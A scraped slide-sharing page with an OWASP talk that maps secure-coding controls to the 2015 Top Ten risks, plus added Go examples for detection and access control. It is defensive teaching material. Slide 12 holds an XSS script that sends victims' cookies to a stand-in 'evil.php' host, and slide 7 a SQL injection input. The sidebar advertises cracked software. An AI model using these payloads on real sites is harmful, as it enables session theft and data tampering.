slidesgo-unlocking-the-code-the-dynamic-dance-of-variables-and-constants-2024...
kr2589474
 
PDF
Step-by-Step Guide to Install SAP HANA Studio | Complete Installation Tutoria...
SAP Vista, an A L T Z E N Company
 
PPTX
Farrell__10e_ch04_PowerPoint.pptx Programming Logic and Design slides
bashnahara11
 
PDF
SAP GUI Installation Guide for macOS (iOS) | Connect to SAP Systems on Mac
SAP Vista, an A L T Z E N Company
 
PDF
Salesforce Pricing Update 2025: Impact, Strategy & Smart Cost Optimization wi...
GetOnCRM Solutions
 
MiniTool Power Data Recovery Crack New Pre Activated Version Latest 2025
imang66g
 
How Agentic AI Networks are Revolutionizing Collaborative AI Ecosystems in 2025
ronakdubey419
 
System Center 2025 vs. 2022; What’s new, what’s next_PDF.pdf
Q-Advise
 
advancepresentationskillshdhdhhdhdhdhhfhf
jasmenrojas249
 
Using licensed Data Loss Prevention (DLP) as a strategic proactive data secur...
Q-Advise
 
Enhancing Healthcare RPM Platforms with Contextual AI Integration
Cadabra Studio
 
TexSender Pro 8.9.1 Crack Full Version Download
cracked shares
 
Brief History of Python by Learning Python in three hours
adanechb21
 
ChessBase 18.02 Crack + Serial Key Free Download
cracked shares
 
Malaysia’s e-Invoice System: A Complete Guide for Businesses
Matiyas Solutions
 
Applitools Platform Pulse: What's New and What's Coming - July 2025
Applitools
 
Why Are More Businesses Choosing Partners Over Freelancers for Salesforce.pdf
Cymetrix Software
 
Generating Union types w/ Static Analysis
K. Matthew Dupree
 
AI Software Engineering based on Multi-view Modeling and Engineering Patterns
Hironori Washizaki
 
Virtual Threads in Java: A New Dimension of Scalability and Performance
Tier1 app
 
slidesgo-unlocking-the-code-the-dynamic-dance-of-variables-and-constants-2024...
kr2589474
 
Step-by-Step Guide to Install SAP HANA Studio | Complete Installation Tutoria...
SAP Vista, an A L T Z E N Company
 
Farrell__10e_ch04_PowerPoint.pptx Programming Logic and Design slides
bashnahara11
 
SAP GUI Installation Guide for macOS (iOS) | Connect to SAP Systems on Mac
SAP Vista, an A L T Z E N Company
 
Salesforce Pricing Update 2025: Impact, Strategy & Smart Cost Optimization wi...
GetOnCRM Solutions
 

Owasp top-ten-mapping-2015-05-lwc

  • 1. OWASP Top Ten Mapping Katy Anton @katyanton 1
  • 2. Katy Anton • Software developer by background • Certified Secure Software Lifecycle Practitioner (CSSLP) • OWASP volunteer • https//www.linkedin.com/in/katyanton • @katyanton 2
  • 3. OWASP Top 10 Risks A1 - Injection A2 - Broken Authentication and Session Management A3 - Cross Site Scripting ( XSS ) A4 - Insecure Direct Object References A5 - Security Misconfiguration A6 - Sensitive Data Exposure A7 - Missing Function Level Access Control A8 - Cross-Site Request Forgery (CSRF) A9 - Using Components with Known Vulnerabilities A10- Unvalidated Redirects and Forwards 3
  • 4. Software Development Lifecycle 4 Design Build Test Production Vulnerability Scanning Security testing, dynamic testing tools Coding guidelines, code reviews, static test tools Security requirements, secure design, threat modelling reactiveproactive
  • 5. Warning This is an awareness document - that will give you some anchors - that you can start using on a regular basis - and start building on. You cannot base a web application on Top 10 only! 5
  • 6. C1. Parameterize queries 6 Query parameterization prevents untrusted input from being interpreted as part of a SQL command: $sql = Update users set email=‘$email’ where id=1;
  • 7. C1: Example of SQL injection 7 $email=‘;- - @owasp.org; $sql = UPDATE user set email=‘$email’ WHERE id=‘1’;
  • 8. C1: Example of SQL injection 8 UPDATE user SET email=‘’; -- @owasp.org' WHERE id=‘1’
  • 9. C1 Control: Data Access Layer 9 PHP: Example of Query Parametrisation $email = $_REQUEST[‘email’]; $id = $_REQUEST[‘id’]; $stmt = $dbh->prepare(”Update users set email=:new_email where id=:user_id”); $stmt->bindParam(':new_email', $email); $stmt->bindParam(':user_id', $id);
  • 10. 10 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. A1 Injection Injection flaws, such as SQL injection occur when untrusted data is sent to an interpreter as part of a command or query.
  • 11. C2. Encode data before using a parser 11
  • 12. C2: Example of XSS 12 <script type=“text/javascript”> var adr = ‘http://myaddress.com/evil.php? stolencookies=‘ + escape(document.cookie); var img = new Image(); img.src = adr; </script>
  • 13. C2: Mechanisms for encoding Change from < 13
  • 14. C2: Mechanisms for encoding Change from < to &lt; 14
  • 15. C2: Resources Reform Project Java, .NET v1/v2, PHP, Python, Perl, JavaScript https://www.owasp.org/index.php/Category:OWASP_Enco ding_Project Java/Scala (Updated January 2015) https://www.owasp.org/index.php/OWASP_Java_Encoder_Proj ect 15
  • 16. 16 Proactive Control Risk(s) prevented C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) A1 Injection Injection flaws, such as SQL injection occur when untrusted data is sent to an interpreter as part of a command or query. A3 XSS XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
  • 17. C3. Validate all input 17
  • 18. C3: Example of Validations 18 • GET / POST data • File upload validate ( file extension, mime type, size) • HTTP Headers, cookies
  • 19. 19 Proactive Control Risk(s) prevented C3: Validate all inputs For web applications this includes: • GET and POST parameters: • File uploads • any or all of this data could be manipulated by an attacker. •A1 Injection •A3 XSS •A10 Unvalidated redirects and forwards
  • 20. C4. Implement appropriate Access Control 20
  • 21. C4: Access Control good practices • Deny by default • Force all requests to go through access control checks • Check on the server when each function is accessed 21
  • 22. 22 Proactive Control Risk(s) prevented C4: Implement Appropriate Access Controls •Deny by default •Force all requests to go through access control checks •Check on the server when each function is accessed A4-Insecure Direct Object References A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check, attackers can manipulate these references to access unauthorised data. A7-Missing Function Level Access Control Attackers will be able to forge requests in order to access functionality without proper authorization.
  • 23. C5. Establish Authentication and Identity Controls 23
  • 24. 1). Protection: Password storage 24 1) Use cryptographically strong credential- specific salt • protect( [salt] + [password] ); • Use a 32char or 64char salt; • Do not depend on hiding, splitting, or otherwise obscuring the salt.
  • 25. 1). Protection: Password storage 25 2) Impose difficult verification on the attacker and defender •PBKDF2([salt] + [password], c=100,000); •Cryptgraphic recommendations: • PBKDF2 (Password-Based Key Derivation 2) • bcrypt • scrypt
  • 26. 1). Protection: Password storage 26 Resources: https://www.owasp.org/index.php/Password_Storage_ Cheat_Sheet
  • 27. 2). Protection: multi-factor authentication Multi-factor authentication - a combination of: • Something you know – password or PIN • Something you own – token, smart card or phone • Something you are – biometrics ( fingerprint ) 27
  • 28. 3). Protection: Forgot Password Forgot password design: 1). Ask one or more security questions 2) Send the user a randomly generated token via: app, SMS 3). Verify code in same web session. 4). Change password. More details on: https://www.owasp.org/index.php/Forgot_Password_Chea t_Sheet 28
  • 29. 29 Proactive Control Risk(s) prevented C5: Establish Identity and Authentication Controls • Design ( password storage) • Multi-factor authentication • Design ( forgot password ) A2-Broken Authentication and Session Management Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities.
  • 30. C6. Data Protection and Privacy 30
  • 31. C6 Controls: Data in transit Data in transit: HTTPS • Confidentiality: Spy cannot view your data • Integrity: Spy cannot change your data • Authenticity: Server you are visiting is the right one HTTPS configuration best practices • https://www.owasp.org/index.php/Transport_Layer _Protection_Cheat_Sheet Data at rest 31
  • 32. C6 Controls: Data at rest 1. Algorithm • AES (Advanced Encryption Standard ) 2. Secure key management 3. Adequate access controls and auditing Resources: • https://www.owasp.org/index.php/Cryptographic_Stor age_Cheat_Sheet • https://www.ssllabs.com/ssltest/index.html 32
  • 33. 33 Proactive Control Risk(s) prevented C6: Data Protection and privacy • Data encryption at rest • Data encryption in transit A6: Sensitive Data Exposure Sensitive data needs extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.
• 34-39. OWASP Top Ten Mapping (slides 34 to 39 build this table one row at a time; the complete table from slide 39 is shown once)
Proactive Control -> Risk(s) prevented
C1: Parameterize Queries. Let the Data Access Layer decide how parameters are interpreted before executing SQL.
• A1 Injection
• A10 Unvalidated redirects and forwards
C2: Encode Data. Encode data before use in a parser (JS, CSS, XML).
• A1 Injection
• A3 XSS
C3: Validate all inputs
• A1 Injection
• A3 XSS
• A10 Unvalidated redirects and forwards
C4: Implement Appropriate Access Controls
• A4 Insecure Direct Object References
• A7 Missing Function Level Access Control
C5: Establish Identity and Authentication Controls. Password storage / Multi-factor authentication / Forgot password design
• A2 Broken Authentication and Session Management
C6: Data Protection and privacy. Data encryption at rest / in transit
• A6 Sensitive Data Exposure
• 40. C7. Logging, Error Handling and Intrusion Detection
• 41. Proactive Control: C7: Implement Logging, Error Handling and Intrusion Detection
Risk(s) prevented:
A1 - Injection
A2 - Broken Authentication and Session Management
A3 - XSS
A4 - Insecure Direct Object References
A5 - Security Misconfiguration
A6 - Sensitive Data Exposure
A7 - Missing Function Level Access Control
A8 - Cross-Site Request Forgery (CSRF)
A9 - Using Components with Known Vulnerabilities
A10 - Unvalidated Redirects and Forwards
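C7 pairs logging with intrusion detection: the log line is the evidence, and a counter over those events is the simplest detector. The example below is added here and is not the deck's code; the event fields, the window and threshold values, and the single "auth_failure" rule are assumptions.

```go
package main

import (
	"fmt"
	"log"
	"time"
)

// SecurityEvent is one structured security log record; never put secrets in Detail.
type SecurityEvent struct {
	When   time.Time
	Kind   string // "auth_failure", "access_denied", "input_rejected", ...
	User   string
	Source string // client address
	Detail string
}

// Detector logs every event and counts auth failures per source inside a sliding window.
type Detector struct {
	Window    time.Duration
	Threshold int
	failures  map[string][]time.Time
	Alerts    []string
}

func NewDetector(window time.Duration, threshold int) *Detector {
	return &Detector{Window: window, Threshold: threshold, failures: map[string][]time.Time{}}
}

// Record writes the log line first (the trail exists even if detection is later
// disabled), then updates the per-source failure window and alerts at the threshold.
func (d *Detector) Record(ev SecurityEvent) (alerted bool) {
	log.Printf("sec kind=%s user=%q src=%s detail=%q", ev.Kind, ev.User, ev.Source, ev.Detail)
	if ev.Kind != "auth_failure" {
		return false
	}
	kept := d.failures[ev.Source][:0] // drop failures older than the window
	for _, t := range d.failures[ev.Source] {
		if ev.When.Sub(t) < d.Window {
			kept = append(kept, t)
		}
	}
	kept = append(kept, ev.When)
	d.failures[ev.Source] = kept
	if len(kept) >= d.Threshold {
		d.Alerts = append(d.Alerts, fmt.Sprintf("possible brute force from %s: %d auth failures within %s", ev.Source, len(kept), d.Window))
		return true
	}
	return false
}
```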
• 42. C8. Leverage Security Features of Frameworks and Security Libraries
• 43. Proactive Control: C8: Leverage Security Features of Frameworks and Security Libraries
For example:
• Choose a good database ORM
• Choose a framework with good access control already built in
• Choose a framework that already has integrated CSRF protection
Risk(s) prevented:
A1 - Injection
A2 - Broken Authentication and Session Management
A3 - XSS
A4 - Insecure Direct Object References
A5 - Security Misconfiguration
A6 - Sensitive Data Exposure
A7 - Missing Function Level Access Control
A8 - Cross-Site Request Forgery (CSRF)
A9 - Using Components with Known Vulnerabilities
A10 - Unvalidated Redirects and Forwards
• 45. C9: Security Requirements
Functional requirements:
> visible to QA and testable
> e.g. forgot password workflow, re-authentication during change password
Non-functional requirements:
> invisible to QA, not easily testable
> e.g. query parametrization, password storage crypto
• 46. Proactive Control: C9: Security Requirements
Example of security requirements:
• Integrity requirements
• Availability requirements
• Authentication & authorization requirements
• Confidentiality requirements
• Auditing and logging requirements
• Session management requirements
• Errors and exception management requirements
• Configuration parameters requirements
• Archiving requirements
• Legal and Compliance Constraints
Risk(s) prevented:
A1 - Injection
A2 - Broken Authentication and Session Management
A3 - XSS
A4 - Insecure Direct Object References
A5 - Security Misconfiguration
A6 - Sensitive Data Exposure
A7 - Missing Function Level Access Control
A8 - Cross-Site Request Forgery (CSRF)
A9 - Using Components with Known Vulnerabilities
A10 - Unvalidated Redirects and Forwards
• 47. C10. Security Architecture and Design
• 48. C10: Security Architecture and Design Principles
Secure design principles:
• Least Privilege = minimum access level for minimum amount of time
• Separation of duties
• Defence in depth, e.g.:
- input validation + parameterized queries
- input validation + output encoding
• Fail secure, e.g.:
- user access denied after maximum number of failed logins reached
- errors and exception handling: store error details in the database, give the user only the reference ID
• Complete mediation, e.g.:
- centralise access control checks
- centralise input validation
• 49. Proactive Control: C10: Security Architecture and Design
Secure design principles:
• Least Privilege
• Separation of duties
• Defence in depth
• Fail secure
• Complete mediation
• Open design
Risk(s) prevented:
A1 - Injection
A2 - Broken Authentication and Session Management
A3 - XSS
A4 - Insecure Direct Object References
A5 - Security Misconfiguration
A6 - Sensitive Data Exposure
A7 - Missing Function Level Access Control
A8 - Cross-Site Request Forgery (CSRF)
A9 - Using Components with Known Vulnerabilities
A10 - Unvalidated Redirects and Forwards
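Two of the slide 48 examples in code: complete mediation (one centralised access control check that every handler calls, denying anything not explicitly listed) and fail secure error handling (full details stored server-side, the user gets only a reference ID). This is an added example, not the deck's code; the permission table, the in-memory error store and the sample SQL error text are constructed for illustration.

```go
package main

import (
	"crypto/rand"
	"encoding/hex"
	"errors"
	"fmt"
)

// permissions is the single authoritative table of who may do what; any
// role/action pair missing from it is denied (deny by default).
var permissions = map[string]map[string]bool{
	"admin": {"report:read": true, "report:delete": true},
	"user":  {"report:read": true},
}

// Authorize is the one chokepoint every handler calls (complete mediation).
func Authorize(role, action string) bool {
	return permissions[role][action] // unknown role or action reads as false
}

// errorStore stands in for the database table that keeps full error details.
var errorStore = map[string]string{}

// HandleError stores the full error server-side and hands the user only an
// opaque reference ID, so stack traces and SQL text never reach the browser.
func HandleError(err error) string {
	b := make([]byte, 8)
	if _, rerr := rand.Read(b); rerr != nil {
		return "An error occurred. Please contact support."
	}
	ref := hex.EncodeToString(b)
	errorStore[ref] = err.Error()
	return "An error occurred. Reference ID: " + ref
}

// DeleteReport combines both principles: central check first, then a failure
// path that leaks nothing. The SQL error text is a constructed sample.
func DeleteReport(role, id string) (msg string, ok bool) {
	if !Authorize(role, "report:delete") {
		return "Access denied", false
	}
	if id == "" {
		return HandleError(errors.New("delete failed: syntax error near 'WHERE id='")), false
	}
	return fmt.Sprintf("deleted report %s", id), true
}
```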